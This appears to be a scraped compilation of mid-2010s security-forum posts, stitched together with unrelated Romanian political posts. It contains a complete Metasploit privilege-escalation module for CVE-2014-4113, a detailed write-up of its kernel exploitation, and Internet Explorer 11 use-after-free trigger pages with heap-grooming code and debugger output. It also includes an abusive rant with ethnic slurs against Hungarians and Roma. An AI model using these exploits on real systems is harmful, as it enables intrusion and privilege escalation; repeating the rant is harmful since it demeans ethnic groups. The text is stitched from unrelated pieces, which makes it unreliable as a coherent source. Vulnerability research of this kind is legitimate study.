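The real svchost.exe in pid 2100 is caught four times over (parent, account, session, missing -k), which is the pattern the post describes for malware that abuses the genuine binary; the look-alike names are caught by edit distance rather than by a fixed list, so new misspellings are covered too. Digital signatures, base priority and network connections from the checklist need live access or a memory image and are left to the tool feeding the listing.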
-
[h=3]Microsoft EMET - Armor against zero-days bypassed again | Conference Slides[/h]

New methods make it possible to circumvent protection mechanisms of Microsoft EMET 5.0

The EMET (Enhanced Mitigation Experience Toolkit) tool developed by Microsoft makes it possible for administrators and end users to retroactively equip applications with additional protection mechanisms. This enhanced protection is intended to prevent various attack techniques that are currently used by cyber attackers. Security expert René Freingruber of the SEC Consult Vulnerability Lab has developed numerous methods to get around the basic protection mechanisms of EMET in all currently available versions. If a cyber-attacker were to use these new bypass methods, serious attacks could be carried out. A software product protected with EMET as a workaround affected by a critical zero-day vulnerability could, for example, fall under the control of attackers. Microsoft was informed of this by SEC Consult and is working on an improvement to the protection methods. The experts of the SEC Consult Vulnerability Lab advise you to not view EMET as an unbeatable protection measure, because the tool can definitely be bypassed with the help of newly discovered methods. SEC Consult considers it necessary for software manufacturers to make the development of applications more secure and to regularly test their software extensively for application security.

[h=3]Demo video[/h]
A video demonstrating the issues has been released: http://youtu.be/TuBQnvnKKHY

[h=3]Slides[/h]
Detailed slides from previous conferences, where the research has been presented by René Freingruber, are available here:

RuxCon, 11-12 October 2014
Short bio/description: https://ruxcon.org.au/speakers/#Ren%C3%A9%20Freingruber
Slides: http://prezi.com/z0kjt1wi_9nl/ruxcon-2014-emet-50-armor-or-curtain/

ToorCon, 25-26 October 2014
Short bio/description: http://sandiego.toorcon.net/conference/#7
Slides: http://prezi.com/qodsslaplj7j/toorcon-2014-emet-50-armor-or-curtain/

Source: SEC Consult: Microsoft EMET - Armor against zero-days bypassed again | Conference Slides
-
[h=1]Windows 8.1 Security Internals[/h]
Date: October 28, 2014 from 5:00PM to 6:15PM
Day 1, Hall 8.0 Room B1, WIN-B411
Speakers: Chris Jackson

Windows continues to innovate on its implementation of core operating system security. To achieve the conflicting goals of security and compatibility, it can be complex. How do you understand how it works? Join "The App Compat Guy" for a deep dive into the operating system internals where security decisions begin. This is an operating system internals session, and not a packaged software session.

Source: Windows 8.1 Security Internals | TechEd Europe 2014 | Channel 9
-
AFD.SYS DANGLING POINTER VULNERABILITY
Pwn2Own 2014

TABLE OF CONTENTS
Affected OS
Overview
Impact
Technical Analysis
  POC code
  Vulnerability Analysis
    Step 1 - IOCTL 0x1207f
    Step 2 - IOCTL 0x120c3
  Exploitation
    READ-/WRITE-Primitives through WorkerFactory Objects
    Controlled Data on NonPagedPoolNx Pool
    Leak Target
    Single-Gadget-ROP for SMEP Evasion
    Shellcode
    Putting it all together
Patch Analysis

Download: http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf
-
How I received 50 lei to applaud Victor Ponta | Iulia Marin | adevarul.ro
-
If you don't go to vote, you prove that you are stupid, ignorant and that you don't care about the country you live in. Nor about yourselves. Later you complain about the president, but you don't realize that it is because of you that things end up this way. You prove nothing to anyone. Nobody will care that only 30% of those with the right to vote turn out, half of whom are Hungarians, gypsies and dumb old women. They are the ones who will decide your future, because you sit in front of the monitor jerking off. So, in the future, when you don't like something in this country, think of the following thought, which I gladly offer you: SUCK DICK.
-
CVE-2014-4113 Detailed Vulnerability and Patch Analysis
Posted on: 24 October 2014
By: siteadm

As you might have heard, Microsoft recently patched some vulnerabilities; vulnerabilities related to Sandworm CVE-2014-4114 (PowerPoint exploit) and font parsing (CVE-2014-4148). But in this article, I'm more interested in talking about CVE-2014-4113, which is a local kernel vulnerability whose successful exploitation would give you SYSTEM access. So I started analyzing the patch (KB3000061) and mid-analysis, I found a PoC for this vulnerability in the wild. Therefore I combined my patch analysis and reverse engineering of the PoC binary together to deeply understand this vulnerability and exploitation technique. Here, I'll share it step by step, with all details, so you'll know everything about CVE-2014-4113.

First of all, I downloaded KB3000061 and I noticed that it just has win32k.sys inside. So I created two folders called Vulnerable and Patched and placed the vulnerable and patched versions of win32k.sys inside them. Next, I loaded both of them in IDA and saved both databases. As the next step I had to see what had changed in the patched version, so I chose TurboDiff for this job. TurboDiff simply gives you a plain-text table of changed functions. For this particular patch, it gave me 25 changed functions. I started checking each changed function and one of them caught my attention. In the internal function of xxxHandleMenuMessages, I noticed that the patched version has an additional check for the value returned from xxxMNFindWindowFromPoint (internal function). That check was a call to the IsMFMWFPWindow function and the parameter to IsMFMWFPWindow was exactly the return value of xxxMNFindWindowFromPoint. So I figured out that something was wrong here and Microsoft added code to check the return value of xxxMNFindWindowFromPoint.

You can see the change here:
Vulnerable win32k.sys:
Patched version:
Take a look at both functions zoomed out, vulnerable part:
Patched part:

Knowing this, I started to think about the exploitation method of this vulnerability, how to trigger this vulnerability and make the xxxHandleMenuMessages API call xxxSendMessage with an invalid HANDLE. As soon as I saw that the vulnerability is related to the window system and a possible NULL value during the xxxHandleMenuMessage process, I just remembered this. For exploiting that, you had to map the zero/null page, create a fake object at the zero page and trigger the vulnerability. So this was the general idea; now I had to find a way to trigger this vulnerability by causing xxxHandleMenuMessage to call xxxSendMessage with a NULL handle. Luckily I suddenly saw that there is a PoC published online for this vulnerability, so as a lazy person, instead of trying to solve it on my own as a practice/challenge, I just downloaded the sample and started to analyze it. Lots of things were as I thought; the only missing part in the chain of exploitation was how to make that NULL in xxxHandleMenuMessage. It was done by hooking and altering parameters in user mode; you can read more about these tricks here and here. So basically the PoC deletes the menu and returns -5, so xxxSendMessage will use a tagWND object starting from -5 (0xFFFFFFFB) to positive values, which is in user mode. The PoC allocates the zero page using ZwAllocateVirtualMemory with 0x01 as the base address and writes a fake tagWND object there. Windows allows zero page allocation for 16-bit application compatibility/support. So the tagWND object has two important parts: one is the WS_EXECUTE_IN_KERNEL flag, which is at offset ((BYTE*)&pWnd->state)+0x02, and the other one is the callback function, which is at offset 0x60. So by setting 0x16 to 0x04, you are telling the kernel that the callback function at 0x60 needs to be executed in kernel.

So the PoC modifies the return value (returns -5) by hooking, but before that, it writes 0x04 to offset 0x16 - 0x05 (0x11) (the WS_EXECUTE_IN_KERNEL flag) and the address of the shellcode at 0x60 - 0x05 (0x5B), which will be executed in kernel. See:

The shellcode does nothing other than replacing the current process token with the SYSTEM process (pid = 4) token. Therefore, any process created by the current process will have the SYSTEM token too. Here is the shellcode:

and here is what the zero page looks like:

The cyan color holds the address of the shellcode and the yellow background holds the WS_EXECUTE_IN_KERNEL flag.

For triggering the vulnerability, it simply creates a two-layer popup menu (one main popup menu and one sub menu inside it), then it calls TrackPopupMenu to trigger the hook. In the hook function, it replaces the window handler using the SetWindowLongA API, see:

and the new handler function simply deletes the popup menu and returns 0xFFFFFFFB (-5):

That was it. Using this simple hooking and altering of the popup menu, the kernel will call and execute the callback function at the null page, in kernel space. I think I've said enough about this bug. So please update your OS, especially servers, as soon as possible, because the lowest access (for example an ASP.NET shell with the ASP.NET user account) can get SYSTEM access using this vulnerability.

Source: https://www.codeandsec.com/CVE-2014-4113-Detailed-Vulnerability-and-Patch-Analysis
-
[h=1]Windows TrackPopupMenu Win32k NULL Pointer Dereference[/h]

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference',
      'Description'    => %q{
        This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability
        can be triggered through the use of TrackPopupMenu. Under special conditions, the
        NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
        code execution. This module has been tested successfully on Windows XP SP3, Windows
        2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows
        2008 R2 SP1 64 bits.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Unknown',          # vulnerability discovery and exploit in the wild
        'juan vazquez',     # msf module (x86 target)
        'Spencer McIntyre'  # msf module (x64 target)
      ],
      'Arch'           => [ ARCH_X86, ARCH_X86_64 ],
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' => {
        'EXITFUNC' => 'thread',
      },
      'Targets'        => [
        # Tested on (32 bits):
        # * Windows XP SP3
        # * Windows 2003 SP2
        # * Windows 7 SP1
        # * Windows 2008
        [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
        # Tested on (64 bits):
        # * Windows 7 SP1
        # * Windows 2008 R2 SP1
        [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
      ],
      'Payload'        => {
        'Space'       => 4096,
        'DisableNops' => true
      },
      'References'     => [
        ['CVE', '2014-4113'],
        ['OSVDB', '113167'],
        ['BID', '70364'],
        ['MSB', 'MS14-058'],
        ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/']
      ],
      'DisclosureDate' => 'Oct 14 2014',
      'DefaultTarget'  => 0
    }))
  end

  def check
    os = sysinfo["OS"]

    if os !~ /windows/i
      return Exploit::CheckCode::Unknown
    end

    if sysinfo["Architecture"] =~ /(wow|x)64/i
      arch = ARCH_X86_64
    elsif sysinfo["Architecture"] =~ /x86/i
      arch = ARCH_X86
    end

    file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
    major, minor, build, revision, branch = file_version(file_path)
    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

    # Neither target supports Windows 8 or 8.1
    return Exploit::CheckCode::Safe if build == 9200
    return Exploit::CheckCode::Safe if build == 9600

    if arch == ARCH_X86
      return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
    else
      return Exploit::CheckCode::Detected if build == 7601
    end

    return Exploit::CheckCode::Unknown
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    if check == Exploit::CheckCode::Safe
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
    end

    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
    elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
    end

    print_status('Launching notepad to host the exploit...')
    notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
    begin
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Reader Sandbox won't allow to create a new process:
      # stdapi_sys_process_execute: Operation failed: Access is denied.
      print_status('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    end

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    if target.arch.first == ARCH_X86
      dll_file_name = 'cve-2014-4113.x86.dll'
    else
      dll_file_name = 'cve-2014-4113.x64.dll'
    end

    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
    library_path = ::File.expand_path(library_path)

    print_status("Injecting exploit into #{process.pid}...")
    exploit_mem, offset = inject_dll_into_process(process, library_path)

    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(process, payload.encoded)

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('Payload injected. Executing exploit...')
    process.thread.create(exploit_mem + offset, payload_mem)

    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end

end

Source: http://www.exploit-db.com/exploits/35101/
-
USE-AFTER-FREE NOT DEAD IN INTERNET EXPLORER: PART 1

In HITCON X, we talked about bypassing new exploit mitigation in Internet Explorer. In this post, we will use a use-after-free vulnerability which has been patched in MS14-056 to explain how to bypass memory protection and isolated heap in Windows 8.1. Let's look into the following code first:

<!DOCTYPE html>
<html>
<head>
<title>test</title>
<script>
function listener(event) {
    head.removeNode(true);
}
function test() {
    var object = document.createElement("object");
    head = document.getElementsByTagName("head")[0];
    head.applyElement(object, "inside");
    object.addEventListener("error", listener, false);
    var range = document.createRange();
    range.setStartAfter(object);
    range.insertNode(object);
    object["innerHTML"] = object["innerHTML"];
    document.write("");
}
</script>
</head>
<body onload="test()"></body>
</html>

Internet Explorer 11 will crash here with page heap enabled and memory protection disabled:

(29c.98c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000005 ebx=07530fe8 ecx=04109fc0 edx=04151cd4 esi=00000005 edi=04109fc0
eip=613fb9fc esp=03eaa89c ebp=03eaa8a4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
MSHTML!CElement::GetFirstCp+0x7:
613fb9fc 8b411c          mov     eax,dword ptr [ecx+1Ch] ds:0023:04109fdc=????????

0:005> !heap -p -a ecx
    address 04109fc0 found in
    _DPH_HEAP_ROOT @ 40b1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    40b16e4:          4109000             2000
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\verifier.dll -
    6e258fc2 verifier!VerifierDisableFaultInjectionExclusionRange+0x00003232
    770e48fc ntdll!RtlDebugFreeHeap+0x00000032
    770a5ed1 ntdll!RtlpFreeHeap+0x00069d01
    7703be35 ntdll!RtlFreeHeap+0x00000485
    6159def9 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122
    614a0bb5 MSHTML!CNoShowElement::`vector deleting destructor'+0x0000002d
    610359df MSHTML!CBase::SubRelease+0x0000002e
    6146c702 MSHTML!CElement::Release+0x00000018
    61442fdd MSHTML!CSpliceRecordList::~CSpliceRecordList+0x0000006e
    61050506 MSHTML!CDoc::CutCopyMove+0x00002181
    610d3f58 MSHTML!RemoveWithBreakOnEmpty+0x00000068
    6105243d MSHTML!InjectHtmlStream+0x0000021b
    6100226e MSHTML!HandleHTMLInjection+0x00000091
    61476894 MSHTML!CElement::InjectInternal+0x000002a9
    6104f7ad MSHTML!CElement::InjectTextOrHTML+0x0000016d
    6104fa09 MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_innerHTML+0x00000056
    6cef8e9d jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x00000165
    6cef9712 jscript9!<lambda_73b9149c3f1de98aaab9368b6ff2ae9d>::operator()+0x0000006b
    6cf471af jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x000000bd
    6cf46ea2 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040
    6cf46ee3 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d
    6cf478fc jscript9!Js::InterpreterStackFrame::Process+0x00002d6d
    6cef6548 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x000001e8

0:005> k
ChildEBP RetAddr
03eaa8a4 61677ba1 MSHTML!CElement::GetFirstCp+0x7
03eaa8c4 61479cec MSHTML!CTitleElement::Notify+0x5d4c84
03eaadf4 6105248c MSHTML!CDoc::CutCopyMove+0x1b4b
03eaaf44 6100226e MSHTML!InjectHtmlStream+0x26a
03eaaf88 61476894 MSHTML!HandleHTMLInjection+0x91
03eab080 6104f7ad MSHTML!CElement::InjectInternal+0x2a9
03eab100 6104fa09 MSHTML!CElement::InjectTextOrHTML+0x16d
03eab128 6cef8e9d MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_innerHTML+0x56
03eab190 6cef9712 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x165
03eab1b0 6cef967e jscript9!<lambda_73b9149c3f1de98aaab9368b6ff2ae9d>::operator()+0x6b
03eab1f8 6cf471af jscript9!Js::JavascriptOperators::CallSetter+0x76
03eab220 6cf46ea2 jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0xbd
03eab240 6cf46ee3 jscript9!Js::JavascriptOperators::OP_SetProperty+0x40
03eab27c 6cf478fc jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x4d
03eab5c8 6cef6548 jscript9!Js::InterpreterStackFrame::Process+0x2d6d
03eab704 07620fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8
WARNING: Frame IP not in any known module. Following frames may be wrong.
03eab710 6cef6ce9 0x7620fd9
03eaba58 6cef6548 jscript9!Js::InterpreterStackFrame::Process+0x1cd7
03eabb74 07620fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8
03eabb80 6cef0685 0x7620fe1
03eabbc8 6cef100e jscript9!Js::JavascriptFunction::CallFunction<1>+0x88
03eabc34 6cef0f60 jscript9!Js::JavascriptFunction::CallRootFunction+0x93
03eabc7c 6cef0ee7 jscript9!ScriptSite::CallRootFunction+0x42
03eabca4 6cef993c jscript9!ScriptSite::Execute+0x6c
03eabd00 6cef9878 jscript9!ScriptEngineBase::ExecuteInternal<0>+0xbb
03eabd18 610fb78f jscript9!ScriptEngineBase::Execute+0x1c
03eabdcc 610fb67c MSHTML!CListenerDispatch::InvokeVar+0x102
03eabdf8 610fb21e MSHTML!CListenerDispatch::Invoke+0x61
03eabe90 6159cfe0 MSHTML!CEventMgr::_InvokeListeners+0x1a2
03eabea8 61469d60 MSHTML!CEventMgr::_InvokeListenersOnWindow+0x42
03eabf30 610fb385 MSHTML!CEventMgr::_InvokeListeners+0xe5
03eac0a0 60ef98bb MSHTML!CEventMgr::Dispatch+0x35a
03eac0c8 60f2f149 MSHTML!CEventMgr::DispatchEvent+0x8c
03eac0f8 60f2f774 MSHTML!COmWindowProxy::Fire_onload+0x120
03eac158 60f2ea16 MSHTML!CMarkup::OnLoadStatusDone+0x412
03eac16c 60f2e2e3 MSHTML!CMarkup::OnLoadStatus+0xc2
03eac5b0 60f290bd MSHTML!CProgSink::DoUpdate+0x4a7
03eac5bc 60e81f12 MSHTML!CProgSink::OnMethodCall+0x12
03eac600 60e68dda MSHTML!GlobalWndOnMethodCall+0x12c
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\user32.dll -
03eac64c 76e675b3 MSHTML!GlobalWndProc+0x15c
03eac678 76e677b8 user32!gapfnScSendMessage+0x18b
03eac6f8 76e679e6 user32!gapfnScSendMessage+0x390
03eac758 76e6783b user32!DispatchMessageW+0x1bb
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\IEFRAME.dll -
03eac764 67478eb4 user32!DispatchMessageW+0x10
03eaf930 674b0a07 IEFRAME!DllCanUnloadNow+0x1541
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\iertutil.dll -
03eaf9e8 6fcc6bac IEFRAME!SetQueryNetSessionCount+0x486
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Internet Explorer\IEShims.dll -
03eaf9f8 6e21bcf2 iertutil!Ordinal101+0x3b7
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\KERNEL32.DLL -
03eafa24 753917ad IEShims!IEShims_CreateWindowEx+0x3607
03eafa30 77063af4 KERNEL32!BaseThreadInitThunk+0x12
03eafa74 77063acd ntdll!__RtlUserThreadStart+0x20
03eafa84 00000000 ntdll!_RtlUserThreadStart+0x1b

It's a CTitleElement use-after-free vulnerability. However, Internet Explorer won't crash if we enable memory protection, so we add CollectGarbage2 into the code:

<!DOCTYPE html>
<html>
<head>
<title>test</title>
<script>
function CollectGarbage2() {
    var button = document.createElement("button");
    button.title = new Array(100000).join("0");
    button.title = null;
    CollectGarbage();
}
function listener(event) {
    head.removeNode(true);
}
function test() {
    var object = document.createElement("object");
    head = document.getElementsByTagName("head")[0];
    head.applyElement(object, "inside");
    object.addEventListener("error", listener, false);
    var range = document.createRange();
    range.setStartAfter(object);
    range.insertNode(object);
    object["innerHTML"] = object["innerHTML"];
    CollectGarbage2();
    document.write("");
}
</script>
</head>
<body onload="test()"></body>
</html>

Internet Explorer 11 will crash here:

(418.172c): Access violation - code c0000005 (!!! second chance !!!)
eax=04959fc0 ebx=049a1b00 ecx=06437fe8 edx=04959ff8 esi=049cffc0 edi=046fac08
eip=61003419 esp=046fabd4 ebp=046fabec iopl=0         nv up ei ng nz na pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010287
MSHTML!CTitleElement::Notify+0xcd:
61003419 8b02            mov     eax,dword ptr [edx]  ds:0023:04959ff8=????????

We've bypassed memory protection obviously. Let's look into MSHTML!CTitleElement::Notify:

.text:63857828 loc_63857828:
.text:63857828                 test    eax, eax
.text:6385782A                 jz      short loc_63857834
.text:6385782C                 cmp     eax, esi
.text:6385782E                 jnz     loc_63783416
...
.text:63783416 loc_63783416:
.text:63783416                 lea     edx, [eax+38h]
.text:63783419                 mov     eax, [edx]        ; retrieve freed CTitleElement and use
.text:6378341B                 jmp     loc_63857828

We need to control 0x38 of CTitleElement accordingly. In HITCON X, we manipulated the LFH to bypass isolated heap in Windows 7. However, Windows 8 introduces frontend allocation randomization, so manipulating the LFH is not a good solution. But backend allocation is not randomized, which can be used to bypass isolated heap. Let's look into the following code first:

<!DOCTYPE html>
<html>
<head>
<script>
function CollectGarbage2() {
    var button = document.createElement("button");
    button.title = new Array(100000).join("0");
    button.title = null;
    CollectGarbage();
}
var junk = new Array();
for (var i = 0; i < 4; i++) {
    junk[i] = document.createElement("title");
}
var title = new Array();
for (var i = 0; i < 4; i++) {
    title[i] = document.createElement("title");
}
title[2] = null;
CollectGarbage2();
CollectGarbage2();
// 1
</script>
<title>test</title>
<script>
function listener(event) {
    head.removeNode(true);
}
function test() {
    // 2
    var object = document.createElement("object");
    head = document.getElementsByTagName("head")[0];
    head.applyElement(object, "inside");
    object.addEventListener("error", listener, false);
    var range = document.createRange();
    range.setStartAfter(object);
    range.insertNode(object);
    object["innerHTML"] = object["innerHTML"];
    title[0] = null;
    title[1] = null;
    title[3] = null;
    CollectGarbage2();
    CollectGarbage2();
    // 3
    var area = new Array();
    for (var i = 0; i < 0x11; i++) {
        area[i] = document.createElement("area");
    }
    for (var i = 0; i < 0x11; i++) {
        area[i].shape = "rect";
        area[i].coords = "1094795585,1094795585,1094795585,1094795585";
    }
    // 4
    document.write("");
}
</script>
</head>
<body onload="test()"></body>
</html>

We disable page heap to see how to bypass isolated heap.

1. First, we create 4 CTitleElement to prevent heap coalescing with the previous heap. Then, we create another 4 CTitleElement and make a hole.

030e4500 0009 0009  [00]   030e4508    00040 - (busy)   // junk[3]
    MSHTML!CTitleElement::`vftable'
030e4548 0009 0009  [00]   030e4550    00040 - (busy)   // title[0]
    MSHTML!CTitleElement::`vftable'
030e4590 0009 0009  [00]   030e4598    00040 - (busy)   // title[1]
    MSHTML!CTitleElement::`vftable'
030e45d8 0009 0009  [00]   030e45e0    00040 - (free)   // hole
030e4620 0009 0009  [00]   030e4628    00040 - (busy)   // title[3]
    MSHTML!CTitleElement::`vftable'

2. We fill the hole with the use-after-free CTitleElement. We need to control 0x030e45e0 + 0x38.

030e4500 0009 0009  [00]   030e4508    00040 - (busy)   // junk[3]
    MSHTML!CTitleElement::`vftable'
030e4548 0009 0009  [00]   030e4550    00040 - (busy)   // title[0]
    MSHTML!CTitleElement::`vftable'
030e4590 0009 0009  [00]   030e4598    00040 - (busy)   // title[1]
    MSHTML!CTitleElement::`vftable'
030e45d8 0009 0009  [00]   030e45e0    00040 - (busy)   // the use-after-free CTitleElement
    MSHTML!CTitleElement::`vftable'
030e4620 0009 0009  [00]   030e4628    00040 - (busy)   // title[3]
    MSHTML!CTitleElement::`vftable'

3. We trigger freeing of the use-after-free CTitleElement and free the other CTitleElement of the title array to trigger heap coalescing.

030e4500 0009 0009  [00]   030e4508    00040 - (busy)   // junk[3]
    MSHTML!CTitleElement::`vftable'
030e4548 0024 0009  [00]   030e4550    00118 - (free)   // coalesced heap

4. We fill the coalesced heap with CAreaElement to control 0x030e45e0 + 0x38.

030e4500 0009 0009  [00]   030e4508    00040 - (busy)
    MSHTML!CTitleElement::`vftable'
030e4548 000e 0009  [00]   030e4550    00064 - (busy)
    MSHTML!CAreaElement::`vftable'
030e45b8 000e 000e  [00]   030e45c0    00064 - (busy)
    MSHTML!CAreaElement::`vftable'

0:006> dd 0x030e45e0 + 0x38
030e4618  41414141 00000000 00000001 00000000
030e4628  64548e48 0000d8fa 030e4cf0 030e58a0
030e4638  00000000 00000000 00000000 00000000
030e4648  00000000 00000000 00000000 00000000
030e4658  00000000 00000000 00000000 00000000
030e4668  61558e4c 0800d8fc 00000000 00000000
030e4678  00000000 00000000 00000000 00000000
030e4688  00000000 00000000 00000000 00000000

As we can see, we've bypassed isolated heap.

(818.a74): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=030e5300 ecx=00ae7f88 edx=41414179 esi=030e7400 edi=02fdabd8
eip=72cd3419 esp=02fdaba4 ebp=02fdabbc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
MSHTML!CTitleElement::Notify+0xcd:
72cd3419 8b02            mov     eax,dword ptr [edx]  ds:002b:41414179=????????

Source: KeenTeam - Blog
-
HTTP Public-Key-Pinning explained

In my last post “Deploying TLS the hard way” I explained how TLS and its extensions (as well as a few HTTP extensions) work and what to watch out for when enabling TLS for your server. One of the HTTP extensions mentioned is HTTP Public-Key-Pinning (HPKP). As a short reminder, the header looks like this:

Public-Key-Pins: pin-sha256="GRAH5Ex+kB4cCQi5gMU82urf+6kEgbVtzfCSkw55AGk="; pin-sha256="lERGk61FITjzyKHcJ89xpc6aDwtRkOPAU0jdnUqzW2s="; max-age=15768000; includeSubDomains

You can see that it specifies two pin-sha256 values, that is the pins of two public keys. One is the public key of your currently valid certificate and the other is a backup key in case you have to revoke your certificate. I received a few questions as to why I suggest including a backup pin and what the requirements for a backup key would be. I will try to answer those with a more detailed overview of how public key pinning and TLS certificates work.

How are RSA keys represented?

Let us go back to the beginning and start by taking a closer look at RSA keys:

$ openssl genrsa 4096

The above command generates a 4096 bit RSA key and prints it to the console. Although it says -----BEGIN RSA PRIVATE KEY----- it does not only return the private key but an ASN.1 structure that also contains the public key - we thus actually generated an RSA key pair.

A common misconception when learning about keys and certificates is that the RSA key itself for a given certificate expires. RSA keys however never expire - after all they are just three numbers. Only the certificate containing the public key can expire and only the certificate can be revoked. Keys “expire” or are “revoked” as soon as there are no more valid certificates using the public key, and you threw away the keys and stopped using them altogether.

What does the TLS certificate contain?

By submitting the Certificate Signing Request (CSR) containing your public key to a Certificate Authority it will issue a valid certificate. That will again contain the public key of the RSA key pair we generated above and an expiration date. Both the public key and the expiration date will be signed by the CA so that modifications of any of the two would render the certificate invalid immediately.

For simplicity I left out a few other fields that X.509 certificates contain to properly authenticate TLS connections, for example your server’s hostname and other details.

How does public key pinning work?

The whole purpose of public key pinning is to detect when the public key of a certificate for a specific host has changed. That may happen when an attacker compromises a CA such that they are able to issue valid certificates for any domain. A foreign CA might also just be the attacker, think of state-owned CAs that you do not want to be able to {M,W}ITM your site. Any attacker intercepting a connection from a visitor to your server with a forged certificate can only be prevented by detecting that the public key has changed.

After the server sent a TLS certificate with the handshake, the browser will look up any stored pins for the given hostname and check whether any of those stored pins match any of the SPKI fingerprints (the output of applying SHA-256 to the public key information) in the certificate chain. The connection must be terminated immediately if pin validation fails.

If the browser does not find any stored pins for the current hostname then it will directly continue with the usual certificate checks. This might happen if the site does not support public key pinning and does not send any HPKP headers at all, or if this is the first time visiting and the server has not seen the HPKP header yet in a previous visit.

Pin validation should happen as soon as possible and thus before any basic certificate checks are performed. An expired or revoked certificate will be happily accepted at the pin validation stage early in the handshake when any of the SPKI fingerprints of its chain match a stored pin. Only a little later the browser will see that the certificate already expired or was revoked and will reject it. Pin validation also works for self-signed certificates, but they will of course raise the same warnings as usual as soon as the browser determined they were not signed by a trusted third-party.

What if your certificate was revoked?

If your server was compromised and an attacker obtained your private key you have to revoke your certificate as the attacker can obviously fully intercept any TLS connection to your server and record every conversation. If your HPKP header contained only a single pin-sha256 token you are out of luck until the max-age directive given in the header lets those pins expire in your visitors’ browsers.

Pin validation requires checking the SPKI fingerprints of all certificates in the chain. When for example StartSSL signed your certificate you have another intermediate Class 1 or 2 certificate and their root certificate in the chain. The browser trusts only the root certificate but the intermediate ones are signed by the root certificate. The intermediate certificate in turn signs the certificate deployed on your server and that is called a chain of trust.

To prevent getting stuck after your only pinned key was compromised, you could for example provide the SPKI fingerprint of StartSSL’s Class 1 intermediate certificate. An attacker would now have to somehow get a certificate issued by StartSSL’s Class 1 tier to successfully impersonate you. You are however again out of luck should you decide to upgrade to Class 2 in a month because you decided to start paying for a certificate. Pinning StartSSL’s root certificate would let you switch Classes any time and the attacker would still have to get a certificate issued by StartSSL for your domain.

This is a valid approach as long as you are trusting your CA (really?) and as long as the CA itself is not compromised. In case of a compromise however the attacker would be able to get a valid certificate for your domain that passes pin validation. After the attack was discovered StartSSL would quickly revoke all currently issued certificates, generate a new key pair for their root certificate and issue new certificates. And again we would be out of luck because suddenly pin validation fails and no browser will connect to our site.

Include the pin of a backup key

The safest way to pin your certificate’s public key and be prepared to revoke your certificate when necessary is to include the pin of a second public key: your backup key. This backup RSA key should in no way be related to your first key, just generate a new one.

